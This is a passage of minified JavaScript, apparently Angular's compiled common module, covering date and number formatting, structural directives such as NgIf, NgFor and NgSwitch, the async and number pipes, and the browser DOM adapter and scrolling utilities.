a;switch(t){case"G":case"GG":case"GGG":a=pr(Tn.Eras,Zn.Abbreviated);break;case"GGGG":a=pr(Tn.Eras,Zn.Wide);break;case"GGGGG":a=pr(Tn.Eras,Zn.Narrow);break;case"y":a=gs(Ga.FullYear,1,0,!1,!0);break;case"yy":a=gs(Ga.FullYear,2,0,!0,!0);break;case"yyy":a=gs(Ga.FullYear,3,0,!1,!0);break;case"yyyy":a=gs(Ga.FullYear,4,0,!1,!0);break;case"Y":a=Kv(1);break;case"YY":a=Kv(2,!0);break;case"YYY":a=Kv(3);break;case"YYYY":a=Kv(4);break;case"M":case"L":a=gs(Ga.Month,1,1);break;case"MM":case"LL":a=gs(Ga.Month,2,1);break;case"MMM":a=pr(Tn.Months,Zn.Abbreviated);break;case"MMMM":a=pr(Tn.Months,Zn.Wide);break;case"MMMMM":a=pr(Tn.Months,Zn.Narrow);break;case"LLL":a=pr(Tn.Months,Zn.Abbreviated,Jr.Standalone);break;case"LLLL":a=pr(Tn.Months,Zn.Wide,Jr.Standalone);break;case"LLLLL":a=pr(Tn.Months,Zn.Narrow,Jr.Standalone);break;case"w":a=t6(1);break;case"ww":a=t6(2);break;case"W":a=t6(1,!0);break;case"d":a=gs(Ga.Date,1);break;case"dd":a=gs(Ga.Date,2);break;case"c":case"cc":a=gs(Ga.Day,1);break;case"ccc":a=pr(Tn.Days,Zn.Abbreviated,Jr.Standalone);break;case"cccc":a=pr(Tn.Days,Zn.Wide,Jr.Standalone);break;case"ccccc":a=pr(Tn.Days,Zn.Narrow,Jr.Standalone);break;case"cccccc":a=pr(Tn.Days,Zn.Short,Jr.Standalone);break;case"E":case"EE":case"EEE":a=pr(Tn.Days,Zn.Abbreviated);break;case"EEEE":a=pr(Tn.Days,Zn.Wide);break;case"EEEEE":a=pr(Tn.Days,Zn.Narrow);break;case"EEEEEE":a=pr(Tn.Days,Zn.Short);break;case"a":case"aa":case"aaa":a=pr(Tn.DayPeriods,Zn.Abbreviated);break;case"aaaa":a=pr(Tn.DayPeriods,Zn.Wide);break;case"aaaaa":a=pr(Tn.DayPeriods,Zn.Narrow);break;case"b":case"bb":case"bbb":a=pr(Tn.DayPeriods,Zn.Abbreviated,Jr.Standalone,!0);break;case"bbbb":a=pr(Tn.DayPeriods,Zn.Wide,Jr.Standalone,!0);break;case"bbbbb":a=pr(Tn.DayPeriods,Zn.Narrow,Jr.Standalone,!0);break;case"B":case"BB":case"BBB":a=pr(Tn.DayPeriods,Zn.Abbreviated,Jr.Format,!0);break;case"BBBB":a=pr(Tn.DayPeriods,Zn.Wide,Jr.Format,!0);break;case"BBBBB":a=pr(Tn.DayPeriods,Zn.Narrow,Jr.Format,!0);break;case"h":a=gs(Ga.Hours,1,-12);break;case"hh":a=gs(Ga.Hours,2,-12);break;case"H":a=gs(Ga.Hours,1);break;case"HH":a=gs(Ga.Hours,2);break;case"m":a=gs(Ga.Minutes,1);break;case"mm":a=gs(Ga.Minutes,2);break;case"s":a=gs(Ga.Seconds,1);break;case"ss":a=gs(Ga.Seconds,2);break;case"S":a=gs(Ga.FractionalSeconds,1);break;case"SS":a=gs(Ga.FractionalSeconds,2);break;case"SSS":a=gs(Ga.FractionalSeconds,3);break;case"Z":case"ZZ":case"ZZZ":a=Qv(Ns.Short);break;case"ZZZZZ":a=Qv(Ns.Extended);break;case"O":case"OO":case"OOO":case"z":case"zz":case"zzz":a=Qv(Ns.ShortGMT);break;case"OOOO":case"ZZZZ":case"zzzz":a=Qv(Ns.Long);break;default:return null}return a6[t]=a,a}(q);k+=Y?Y(n,e,T):"''"===q?"'":q.replace(/(^'|'$)/g,"").replace(/''/g,"'")}),k}function Gv(t,a,e){const i=new Date(0);return i.setFullYear(t,a,e),i.setHours(0,0,0),i}function xh(t,a){const e=function Qoe(t){return Kc(t)[Ji.LocaleId]}(t);if(ay[e]=ay[e]||{},ay[e][a])return ay[e][a];let i="";switch(a){case"shortDate":i=Hv(t,Pr.Short);break;case"mediumDate":i=Hv(t,Pr.Medium);break;case"longDate":i=Hv(t,Pr.Long);break;case"fullDate":i=Hv(t,Pr.Full);break;case"shortTime":i=Uv(t,Pr.Short);break;case"mediumTime":i=Uv(t,Pr.Medium);break;case"longTime":i=Uv(t,Pr.Long);break;case"fullTime":i=Uv(t,Pr.Full);break;case"short":const n=xh(t,"shortTime"),r=xh(t,"shortDate");i=jv(qv(t,Pr.Short),[n,r]);break;case"medium":const c=xh(t,"mediumTime"),d=xh(t,"mediumDate");i=jv(qv(t,Pr.Medium),[c,d]);break;case"long":const T=xh(t,"longTime"),k=xh(t,"longDate");i=jv(qv(t,Pr.Long),[T,k]);break;case"full":const q=xh(t,"fullTime"),Y=xh(t,"fullDate");i=jv(qv(t,Pr.Full),[q,Y])}return i&&(ay[e][a]=i),i}function jv(t,a){return a&&(t=t.replace(/\{([^}]+)}/g,function(e,i){return null!=a&&i in a?a[i]:e})),t}function um(t,a,e="-",i,n){let r="";(t<0||n&&t<=0)&&(n?t=1-t:(t=-t,r=e));let c=String(t);for(;c.length<a;)c="0"+c;return i&&(c=c.slice(c.length-a)),r+c}function gs(t,a,e=0,i=!1,n=!1){return function(r,c){let d=function cre(t,a){switch(t){case Ga.FullYear:return a.getFullYear();case Ga.Month:return a.getMonth();case Ga.Date:return a.getDate();case Ga.Hours:return a.getHours();case Ga.Minutes:return a.getMinutes();case Ga.Seconds:return a.getSeconds();case Ga.FractionalSeconds:return a.getMilliseconds();case Ga.Day:return a.getDay();default:throw new Error(`Unknown DateType value "${t}".`)}}(t,r);if((e>0||d>-e)&&(d+=e),t===Ga.Hours)0===d&&-12===e&&(d=12);else if(t===Ga.FractionalSeconds)return function sre(t,a){return um(t,3).substring(0,a)}(d,a);const T=yd(c,Ba.MinusSign);return um(d,a,T,i,n)}}function pr(t,a,e=Jr.Format,i=!1){return function(n,r){return function lre(t,a,e,i,n,r){switch(e){case Tn.Months:return function Xoe(t,a,e){const i=Kc(t),r=bd([i[Ji.MonthsFormat],i[Ji.MonthsStandalone]],a);return bd(r,e)}(a,n,i)[t.getMonth()];case Tn.Days:return function Koe(t,a,e){const i=Kc(t),r=bd([i[Ji.DaysFormat],i[Ji.DaysStandalone]],a);return bd(r,e)}(a,n,i)[t.getDay()];case Tn.DayPeriods:const c=t.getHours(),d=t.getMinutes();if(r){const k=function ere(t){const a=Kc(t);return oP(a),(a[Ji.ExtraData][2]||[]).map(i=>"string"==typeof i?ZD(i):[ZD(i[0]),ZD(i[1])])}(a),q=function tre(t,a,e){const i=Kc(t);oP(i);const r=bd([i[Ji.ExtraData][0],i[Ji.ExtraData][1]],a)||[];return bd(r,e)||[]}(a,n,i),Y=k.findIndex(te=>{if(Array.isArray(te)){const[pe,Re]=te,Fe=c>=pe.hours&&d>=pe.minutes,Ne=c<Re.hours||c===Re.hours&&d<Re.minutes;if(pe.hours<Re.hours){if(Fe&&Ne)return!0}else if(Fe||Ne)return!0}else if(te.hours===c&&te.minutes===d)return!0;return!1});if(-1!==Y)return q[Y]}return function $oe(t,a,e){const i=Kc(t),r=bd([i[Ji.DayPeriodsFormat],i[Ji.DayPeriodsStandalone]],a);return bd(r,e)}(a,n,i)[c<12?0:1];case Tn.Eras:return function Yoe(t,a){return bd(Kc(t)[Ji.Eras],a)}(a,i)[t.getFullYear()<=0?0:1];default:throw new Error(`unexpected translation type ${e}`)}}(n,r,t,a,e,i)}}function Qv(t){return function(a,e,i){const n=-1*i,r=yd(e,Ba.MinusSign),c=n>0?Math.floor(n/60):Math.ceil(n/60);switch(t){case Ns.Short:return(n>=0?"+":"")+um(c,2,r)+um(Math.abs(n%60),2,r);case Ns.ShortGMT:return"GMT"+(n>=0?"+":"")+um(c,1,r);case Ns.Long:return"GMT"+(n>=0?"+":"")+um(c,2,r)+":"+um(Math.abs(n%60),2,r);case Ns.Extended:return 0===i?"Z":(n>=0?"+":"")+um(c,2,r)+":"+um(Math.abs(n%60),2,r);default:throw new Error(`Unknown zone width "${t}"`)}}}function rP(t){return Gv(t.getFullYear(),t.getMonth(),t.getDate()+(4-t.getDay()))}function t6(t,a=!1){return function(e,i){let n;if(a){const r=new Date(e.getFullYear(),e.getMonth(),1).getDay()-1,c=e.getDate();n=1+Math.floor((c+r)/7)}else{const r=rP(e),c=function mre(t){const a=Gv(t,0,1).getDay();return Gv(t,0,1+(a<=4?4:11)-a)}(r.getFullYear()),d=r.getTime()-c.getTime();n=1+Math.round(d/6048e5)}return um(n,t,yd(i,Ba.MinusSign))}}function Kv(t,a=!1){return function(e,i){return um(rP(e).getFullYear(),t,yd(i,Ba.MinusSign),a)}}const a6={};function sP(t,a){t=t.replace(/:/g,"");const e=Date.parse("Jan 01, 1970 00:00:00 "+t)/6e4;return isNaN(e)?a:e}function cP(t){return t instanceof Date&&!isNaN(t.valueOf())}const gre=/^(\d+)?\.((\d+)(-(\d+))?)?$/;function s6(t){const a=parseInt(t);if(isNaN(a))throw new Error("Invalid integer literal when parsing "+t);return a}function uP(t,a){a=encodeURIComponent(a);for(const e of t.split(";")){const i=e.indexOf("="),[n,r]=-1==i?[e,""]:[e.slice(0,i),e.slice(i+1)];if(n.trim()===a)return decodeURIComponent(r)}return null}let ag=(()=>{class t{constructor(e,i,n,r){this._iterableDiffers=e,this._keyValueDiffers=i,this._ngEl=n,this._renderer=r,this._iterableDiffer=null,this._keyValueDiffer=null,this._initialClasses=[],this._rawClass=null}set klass(e){this._removeClasses(this._initialClasses),this._initialClasses="string"==typeof e?e.split(/\s+/):[],this._applyClasses(this._initialClasses),this._applyClasses(this._rawClass)}set ngClass(e){this._removeClasses(this._rawClass),this._applyClasses(this._initialClasses),this._iterableDiffer=null,this._keyValueDiffer=null,this._rawClass="string"==typeof e?e.split(/\s+/):e,this._rawClass&&(HC(this._rawClass)?this._iterableDiffer=this._iterableDiffers.find(this._rawClass).create():this._keyValueDiffer=this._keyValueDiffers.find(this._rawClass).create())}ngDoCheck(){if(this._iterableDiffer){const e=this._iterableDiffer.diff(this._rawClass);e&&this._applyIterableChanges(e)}else if(this._keyValueDiffer){const e=this._keyValueDiffer.diff(this._rawClass);e&&this._applyKeyValueChanges(e)}}_applyKeyValueChanges(e){e.forEachAddedItem(i=>this._toggleClass(i.key,i.currentValue)),e.forEachChangedItem(i=>this._toggleClass(i.key,i.currentValue)),e.forEachRemovedItem(i=>{i.previousValue&&this._toggleClass(i.key,!1)})}_applyIterableChanges(e){e.forEachAddedItem(i=>{if("string"!=typeof i.item)throw new Error(`NgClass can only toggle CSS classes expressed as strings, got ${Wo(i.item)}`);this._toggleClass(i.item,!0)}),e.forEachRemovedItem(i=>this._toggleClass(i.item,!1))}_applyClasses(e){e&&(Array.isArray(e)||e instanceof Set?e.forEach(i=>this._toggleClass(i,!0)):Object.keys(e).forEach(i=>this._toggleClass(i,!!e[i])))}_removeClasses(e){e&&(Array.isArray(e)||e instanceof Set?e.forEach(i=>this._toggleClass(i,!1)):Object.keys(e).forEach(i=>this._toggleClass(i,!1)))}_toggleClass(e,i){(e=e.trim())&&e.split(/\s+/g).forEach(n=>{i?this._renderer.addClass(this._ngEl.nativeElement,n):this._renderer.removeClass(this._ngEl.nativeElement,n)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cd),Ee(f1),Ee(mi),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngClass",""]],inputs:{klass:["class","klass"],ngClass:"ngClass"},standalone:!0}),t})(),hP=(()=>{class t{constructor(e){this._viewContainerRef=e,this.ngComponentOutlet=null}ngOnChanges(e){const{_viewContainerRef:i,ngComponentOutletNgModule:n,ngComponentOutletNgModuleFactory:r}=this;if(i.clear(),this._componentRef=void 0,this.ngComponentOutlet){const c=this.ngComponentOutletInjector||i.parentInjector;(e.ngComponentOutletNgModule||e.ngComponentOutletNgModuleFactory)&&(this._moduleRef&&this._moduleRef.destroy(),this._moduleRef=n?function ene(t,a){return new Nk(t,null!=a?a:null)}(n,fP(c)):r?r.create(fP(c)):void 0),this._componentRef=i.createComponent(this.ngComponentOutlet,{index:i.length,injector:c,ngModuleRef:this._moduleRef,projectableNodes:this.ngComponentOutletContent})}}ngOnDestroy(){this._moduleRef&&this._moduleRef.destroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","ngComponentOutlet",""]],inputs:{ngComponentOutlet:"ngComponentOutlet",ngComponentOutletInjector:"ngComponentOutletInjector",ngComponentOutletContent:"ngComponentOutletContent",ngComponentOutletNgModule:"ngComponentOutletNgModule",ngComponentOutletNgModuleFactory:"ngComponentOutletNgModuleFactory"},standalone:!0,features:[sa]}),t})();function fP(t){return t.get(eg).injector}class Ire{constructor(a,e,i,n){this.$implicit=a,this.ngForOf=e,this.index=i,this.count=n}get first(){return 0===this.index}get last(){return this.index===this.count-1}get even(){return this.index%2==0}get odd(){return!this.even}}let Zi=(()=>{class t{constructor(e,i,n){this._viewContainer=e,this._template=i,this._differs=n,this._ngForOf=null,this._ngForOfDirty=!0,this._differ=null}set ngForOf(e){this._ngForOf=e,this._ngForOfDirty=!0}set ngForTrackBy(e){this._trackByFn=e}get ngForTrackBy(){return this._trackByFn}set ngForTemplate(e){e&&(this._template=e)}ngDoCheck(){if(this._ngForOfDirty){this._ngForOfDirty=!1;const e=this._ngForOf;!this._differ&&e&&(this._differ=this._differs.find(e).create(this.ngForTrackBy))}if(this._differ){const e=this._differ.diff(this._ngForOf);e&&this._applyChanges(e)}}_applyChanges(e){const i=this._viewContainer;e.forEachOperation((n,r,c)=>{if(null==n.previousIndex)i.createEmbeddedView(this._template,new Ire(n.item,this._ngForOf,-1,-1),null===c?void 0:c);else if(null==c)i.remove(null===r?void 0:r);else if(null!==r){const d=i.get(r);i.move(d,c),_P(d,n)}});for(let n=0,r=i.length;n<r;n++){const d=i.get(n).context;d.index=n,d.count=r,d.ngForOf=this._ngForOf}e.forEachIdentityChange(n=>{_P(i.get(n.currentIndex),n)})}static ngTemplateContextGuard(e,i){return!0}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(Cd))},t.\u0275dir=Ot({type:t,selectors:[["","ngFor","","ngForOf",""]],inputs:{ngForOf:"ngForOf",ngForTrackBy:"ngForTrackBy",ngForTemplate:"ngForTemplate"},standalone:!0}),t})();function _P(t,a){t.context.$implicit=a.item}let Ri=(()=>{class t{constructor(e,i){this._viewContainer=e,this._context=new Sre,this._thenTemplateRef=null,this._elseTemplateRef=null,this._thenViewRef=null,this._elseViewRef=null,this._thenTemplateRef=i}set ngIf(e){this._context.$implicit=this._context.ngIf=e,this._updateView()}set ngIfThen(e){gP("ngIfThen",e),this._thenTemplateRef=e,this._thenViewRef=null,this._updateView()}set ngIfElse(e){gP("ngIfElse",e),this._elseTemplateRef=e,this._elseViewRef=null,this._updateView()}_updateView(){this._context.$implicit?this._thenViewRef||(this._viewContainer.clear(),this._elseViewRef=null,this._thenTemplateRef&&(this._thenViewRef=this._viewContainer.createEmbeddedView(this._thenTemplateRef,this._context))):this._elseViewRef||(this._viewContainer.clear(),this._thenViewRef=null,this._elseTemplateRef&&(this._elseViewRef=this._viewContainer.createEmbeddedView(this._elseTemplateRef,this._context)))}static ngTemplateContextGuard(e,i){return!0}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","ngIf",""]],inputs:{ngIf:"ngIf",ngIfThen:"ngIfThen",ngIfElse:"ngIfElse"},standalone:!0}),t})();class Sre{constructor(){this.$implicit=null,this.ngIf=null}}function gP(t,a){if(a&&!a.createEmbeddedView)throw new Error(`${t} must be a TemplateRef, but received '${Wo(a)}'.`)}class l6{constructor(a,e){this._viewContainerRef=a,this._templateRef=e,this._created=!1}create(){this._created=!0,this._viewContainerRef.createEmbeddedView(this._templateRef)}destroy(){this._created=!1,this._viewContainerRef.clear()}enforceState(a){a&&!this._created?this.create():!a&&this._created&&this.destroy()}}let Zf=(()=>{class t{constructor(){this._defaultUsed=!1,this._caseCount=0,this._lastCaseCheckIndex=0,this._lastCasesMatched=!1}set ngSwitch(e){this._ngSwitch=e,0===this._caseCount&&this._updateDefaultCases(!0)}_addCase(){return this._caseCount++}_addDefault(e){this._defaultViews||(this._defaultViews=[]),this._defaultViews.push(e)}_matchCase(e){const i=e==this._ngSwitch;return this._lastCasesMatched=this._lastCasesMatched||i,this._lastCaseCheckIndex++,this._lastCaseCheckIndex===this._caseCount&&(this._updateDefaultCases(!this._lastCasesMatched),this._lastCaseCheckIndex=0,this._lastCasesMatched=!1),i}_updateDefaultCases(e){if(this._defaultViews&&e!==this._defaultUsed){this._defaultUsed=e;for(let i=0;i<this._defaultViews.length;i++)this._defaultViews[i].enforceState(e)}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitch",""]],inputs:{ngSwitch:"ngSwitch"},standalone:!0}),t})(),p1=(()=>{class t{constructor(e,i,n){this.ngSwitch=n,n._addCase(),this._view=new l6(e,i)}ngDoCheck(){this._view.enforceState(this.ngSwitch._matchCase(this.ngSwitchCase))}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(Zf,9))},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitchCase",""]],inputs:{ngSwitchCase:"ngSwitchCase"},standalone:!0}),t})(),d6=(()=>{class t{constructor(e,i,n){n._addDefault(new l6(e,i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(Zf,9))},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitchDefault",""]],standalone:!0}),t})(),Yv=(()=>{class t{constructor(e,i,n){this._ngEl=e,this._differs=i,this._renderer=n,this._ngStyle=null,this._differ=null}set ngStyle(e){this._ngStyle=e,!this._differ&&e&&(this._differ=this._differs.find(e).create())}ngDoCheck(){if(this._differ){const e=this._differ.diff(this._ngStyle);e&&this._applyChanges(e)}}_setStyle(e,i){const[n,r]=e.split("."),c=-1===n.indexOf("-")?void 0:Al.DashCase;null!=i?this._renderer.setStyle(this._ngEl.nativeElement,n,r?`${i}${r}`:i,c):this._renderer.removeStyle(this._ngEl.nativeElement,n,c)}_applyChanges(e){e.forEachRemovedItem(i=>this._setStyle(i.key,null)),e.forEachAddedItem(i=>this._setStyle(i.key,i.currentValue)),e.forEachChangedItem(i=>this._setStyle(i.key,i.currentValue))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(f1),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngStyle",""]],inputs:{ngStyle:"ngStyle"},standalone:!0}),t})(),_1=(()=>{class t{constructor(e){this._viewContainerRef=e,this._viewRef=null,this.ngTemplateOutletContext=null,this.ngTemplateOutlet=null,this.ngTemplateOutletInjector=null}ngOnChanges(e){if(e.ngTemplateOutlet||e.ngTemplateOutletInjector){const i=this._viewContainerRef;if(this._viewRef&&i.remove(i.indexOf(this._viewRef)),this.ngTemplateOutlet){const{ngTemplateOutlet:n,ngTemplateOutletContext:r,ngTemplateOutletInjector:c}=this;this._viewRef=i.createEmbeddedView(n,r,c?{injector:c}:void 0)}else this._viewRef=null}else this._viewRef&&e.ngTemplateOutletContext&&this.ngTemplateOutletContext&&(this._viewRef.context=this.ngTemplateOutletContext)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","ngTemplateOutlet",""]],inputs:{ngTemplateOutletContext:"ngTemplateOutletContext",ngTemplateOutlet:"ngTemplateOutlet",ngTemplateOutletInjector:"ngTemplateOutletInjector"},standalone:!0,features:[sa]}),t})();function hm(t,a){return new gi(2100,!1)}class Pre{createSubscription(a,e){return a.subscribe({next:e,error:i=>{throw i}})}dispose(a){a.unsubscribe()}}class Ore{createSubscription(a,e){return a.then(e,i=>{throw i})}dispose(a){}}const Nre=new Ore,Lre=new Pre;let Jv=(()=>{class t{constructor(e){this._latestValue=null,this._subscription=null,this._obj=null,this._strategy=null,this._ref=e}ngOnDestroy(){this._subscription&&this._dispose(),this._ref=null}transform(e){return this._obj?e!==this._obj?(this._dispose(),this.transform(e)):this._latestValue:(e&&this._subscribe(e),this._latestValue)}_subscribe(e){this._obj=e,this._strategy=this._selectStrategy(e),this._subscription=this._strategy.createSubscription(e,i=>this._updateLatestValue(e,i))}_selectStrategy(e){if(qC(e))return Nre;if(bS(e))return Lre;throw hm()}_dispose(){this._strategy.dispose(this._subscription),this._latestValue=null,this._subscription=null,this._obj=null}_updateLatestValue(e,i){e===this._obj&&(this._latestValue=i,this._ref.markForCheck())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma,16))},t.\u0275pipe=Fr({name:"async",type:t,pure:!1,standalone:!0}),t})(),bP=(()=>{class t{constructor(e){this._locale=e}transform(e,i,n){if(!function m6(t){return!(null==t||""===t||t!=t)}(e))return null;n=n||this._locale;try{return function Are(t,a,e){return function o6(t,a,e,i,n,r,c=!1){let d="",T=!1;if(isFinite(t)){let k=function Ere(t){let i,n,r,c,d,a=Math.abs(t)+"",e=0;for((n=a.indexOf("."))>-1&&(a=a.replace(".","")),(r=a.search(/e/i))>0?(n<0&&(n=r),n+=+a.slice(r+1),a=a.substring(0,r)):n<0&&(n=a.length),r=0;"0"===a.charAt(r);r++);if(r===(d=a.length))i=[0],n=1;else{for(d--;"0"===a.charAt(d);)d--;for(n-=r,i=[],c=0;r<=d;r++,c++)i[c]=Number(a.charAt(r))}return n>22&&(i=i.splice(0,21),e=n-1,n=1),{digits:i,exponent:e,integerLen:n}}(t);c&&(k=function Tre(t){if(0===t.digits[0])return t;const a=t.digits.length-t.integerLen;return t.exponent?t.exponent+=2:(0===a?t.digits.push(0,0):1===a&&t.digits.push(0),t.integerLen+=2),t}(k));let q=a.minInt,Y=a.minFrac,te=a.maxFrac;if(r){const ut=r.match(gre);if(null===ut)throw new Error(`${r} is not a valid digit info`);const Ze=ut[1],yt=ut[3],It=ut[5];null!=Ze&&(q=s6(Ze)),null!=yt&&(Y=s6(yt)),null!=It?te=s6(It):null!=yt&&Y>te&&(te=Y)}!function Dre(t,a,e){if(a>e)throw new Error(`The minimum number of digits after fraction (${a}) is higher than the maximum (${e}).`);let i=t.digits,n=i.length-t.integerLen;const r=Math.min(Math.max(a,n),e);let c=r+t.integerLen,d=i[c];if(c>0){i.splice(Math.max(t.integerLen,c));for(let Y=c;Y<i.length;Y++)i[Y]=0}else{n=Math.max(0,n),t.integerLen=1,i.length=Math.max(1,c=r+1),i[0]=0;for(let Y=1;Y<c;Y++)i[Y]=0}if(d>=5)if(c-1<0){for(let Y=0;Y>c;Y--)i.unshift(0),t.integerLen++;i.unshift(1),t.integerLen++}else i[c-1]++;for(;n<Math.max(0,r);n++)i.push(0);let T=0!==r;const k=a+t.integerLen,q=i.reduceRight(function(Y,te,pe,Re){return Re[pe]=(te+=Y)<10?te:te-10,T&&(0===Re[pe]&&pe>=k?Re.pop():T=!1),te>=10?1:0},0);q&&(i.unshift(q),t.integerLen++)}(k,Y,te);let pe=k.digits,Re=k.integerLen;const Fe=k.exponent;let Ne=[];for(T=pe.every(ut=>!ut);Re<q;Re++)pe.unshift(0);for(;Re<0;Re++)pe.unshift(0);Re>0?Ne=pe.splice(Re,pe.length):(Ne=pe,pe=[0]);const et=[];for(pe.length>=a.lgSize&&et.unshift(pe.splice(-a.lgSize,pe.length).join(""));pe.length>a.gSize;)et.unshift(pe.splice(-a.gSize,pe.length).join(""));pe.length&&et.unshift(pe.join("")),d=et.join(yd(e,i)),Ne.length&&(d+=yd(e,n)+Ne.join("")),Fe&&(d+=yd(e,Ba.Exponential)+"+"+Fe)}else d=yd(e,Ba.Infinity);return d=t<0&&!T?a.negPre+d+a.negSuf:a.posPre+d+a.posSuf,d}(t,function r6(t,a="-"){const e={minInt:1,minFrac:0,maxFrac:0,posPre:"",posSuf:"",negPre:"",negSuf:"",gSize:0,lgSize:0},i=t.split(";"),n=i[0],r=i[1],c=-1!==n.indexOf(".")?n.split("."):[n.substring(0,n.lastIndexOf("0")+1),n.substring(n.lastIndexOf("0")+1)],d=c[0],T=c[1]||"";e.posPre=d.substring(0,d.indexOf("#"));for(let q=0;q<T.length;q++){const Y=T.charAt(q);"0"===Y?e.minFrac=e.maxFrac=q+1:"#"===Y?e.maxFrac=q+1:e.posSuf+=Y}const k=d.split(",");if(e.gSize=k[1]?k[1].length:0,e.lgSize=k[2]||k[1]?(k[2]||k[1]).length:0,r){const q=n.length-e.posPre.length-e.posSuf.length,Y=r.indexOf("#");e.negPre=r.substring(0,Y).replace(/'/g,""),e.negSuf=r.slice(Y+q).replace(/'/g,"")}else e.negPre=a+e.posPre,e.negSuf=e.posSuf;return e}(function JD(t,a){return Kc(t)[Ji.NumberFormats][a]}(a,Tl.Decimal),yd(a,Ba.MinusSign)),a,Ba.Group,Ba.Decimal,e)}(function u6(t){if("string"==typeof t&&!isNaN(Number(t)-parseFloat(t)))return Number(t);if("number"!=typeof t)throw new Error(`${t} is not a number`);return t}(e),n,i)}catch(r){throw hm()}}}return t.\u0275fac=function(e){return new(e||t)(Ee(dm,16))},t.\u0275pipe=Fr({name:"number",type:t,pure:!0,standalone:!0}),t})();let rn=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const MP="browser";function ng(t){return t===MP}function Zv(t){return"server"===t}let tse=(()=>{class t{}return t.\u0275prov=hi({token:t,providedIn:"root",factory:()=>new ise(At(ga),window)}),t})();class ise{constructor(a,e){this.document=a,this.window=e,this.offset=()=>[0,0]}setOffset(a){this.offset=Array.isArray(a)?()=>a:a}getScrollPosition(){return this.supportsScrolling()?[this.window.pageXOffset,this.window.pageYOffset]:[0,0]}scrollToPosition(a){this.supportsScrolling()&&this.window.scrollTo(a[0],a[1])}scrollToAnchor(a){if(!this.supportsScrolling())return;const e=function ase(t,a){const e=t.getElementById(a)||t.getElementsByName(a)[0];if(e)return e;if("function"==typeof t.createTreeWalker&&t.body&&(t.body.createShadowRoot||t.body.attachShadow)){const i=t.createTreeWalker(t.body,NodeFilter.SHOW_ELEMENT);let n=i.currentNode;for(;n;){const r=n.shadowRoot;if(r){const c=r.getElementById(a)||r.querySelector(`[name="${a}"]`);if(c)return c}n=i.nextNode()}}return null}(this.document,a);e&&(this.scrollToElement(e),e.focus())}setHistoryScrollRestoration(a){if(this.supportScrollRestoration()){const e=this.window.history;e&&e.scrollRestoration&&(e.scrollRestoration=a)}}scrollToElement(a){const e=a.getBoundingClientRect(),i=e.left+this.window.pageXOffset,n=e.top+this.window.pageYOffset,r=this.offset();this.window.scrollTo(i-r[0],n-r[1])}supportScrollRestoration(){try{if(!this.supportsScrolling())return!1;const a=vP(this.window.history)||vP(Object.getPrototypeOf(this.window.history));return!(!a||!a.writable&&!a.set)}catch(a){return!1}}supportsScrolling(){try{return!!this.window&&!!this.window.scrollTo&&"pageXOffset"in this.window}catch(a){return!1}}}function vP(t){return Object.getOwnPropertyDescriptor(t,"scrollRestoration")}class AP{}class p6 extends class Mse extends class Voe{}{constructor(){super(...arguments),this.supportsDOMEvents=!0}}{static makeCurrent(){!function Foe(t){Bv||(Bv=t)}(new p6)}onAndCancel(a,e,i){return a.addEventListener(e,i,!1),()=>{a.removeEventListener(e,i,!1)}}dispatchEvent(a,e){a.dispatchEvent(e)}remove(a){a.parentNode&&a.parentNode.removeChild(a)}createElement(a,e){return(e=e||this.getDefaultDocument()).createElement(a)}createHtmlDocument(){return document.implementation.createHTMLDocument("fakeTitle")}getDefaultDocument(){return document}isElementNode(a){return a.nodeType===Node.ELEMENT_NODE}isShadowRoot(a){return a instanceof DocumentFragment}getGlobalEventTarget(a,e){return"window"===e?window:"document"===e?a:"body"===e?a.body:null}getBaseHref(a){const e=function vse(){return ry=ry||document.querySelector("base"),ry?ry.getAttribute("href"):null}();return null==e?null:function Ase(t){t4=t4||document.createElement("a"),t4.setAttribute("href",t);const a=t4.pathname;return"/"===a.charAt(0)?a:`/${a}`}(e)}resetBaseElement(){ry=null}getUserAgent(){return window.navigator.userAgent}getCookie(a){return uP(document.cookie,a)}}let t4,ry=null;const xP=new ni("TRANSITION_ID"),Ese=[{provide:Nv,useFactory:function Tse(t,a,e){return()=>{e.get(Lv).donePromise.then(()=>{const i=su(),n=a.querySelectorAll(`style[ng-transition="${t}"]`);for(let r=0;r<n.length;r++)i.remove(n[r])})}},deps:[xP,ga,Ko],multi:!0}];let xse=(()=>{class t{build(){return new XMLHttpRequest}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const a4=new ni("EventManagerPlugins");let n4=(()=>{class t{constructor(e,i){this._zone=i,this._eventNameToPlugin=new Map,e.forEach(n=>n.manager=this),this._plugins=e.slice().reverse()}addEventListener(e,i,n){return this._findPluginFor(i).addEventListener(e,i,n)}addGlobalEventListener(e,i,n){return this._findPluginFor(i).addGlobalEventListener(e,i,n)}getZone(){return this._zone}_findPluginFor(e){const i=this._eventNameToPlugin.get(e);if(i)return i;const n=this._plugins;for(let r=0;r<n.length;r++){const c=n[r];if(c.supports(e))return this._eventNameToPlugin.set(e,c),c}throw new Error(`No event manager plugin found for event ${e}`)}}return t.\u0275fac=function(e){return new(e||t)(At(a4),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class wP{constructor(a){this._doc=a}addGlobalEventListener(a,e,i){const n=su().getGlobalEventTarget(this._doc,a);if(!n)throw new Error(`Unsupported event target ${n} for event ${e}`);return this.addEventListener(n,e,i)}}let IP=(()=>{class t{constructor(){this._stylesSet=new Set}addStyles(e){const i=new 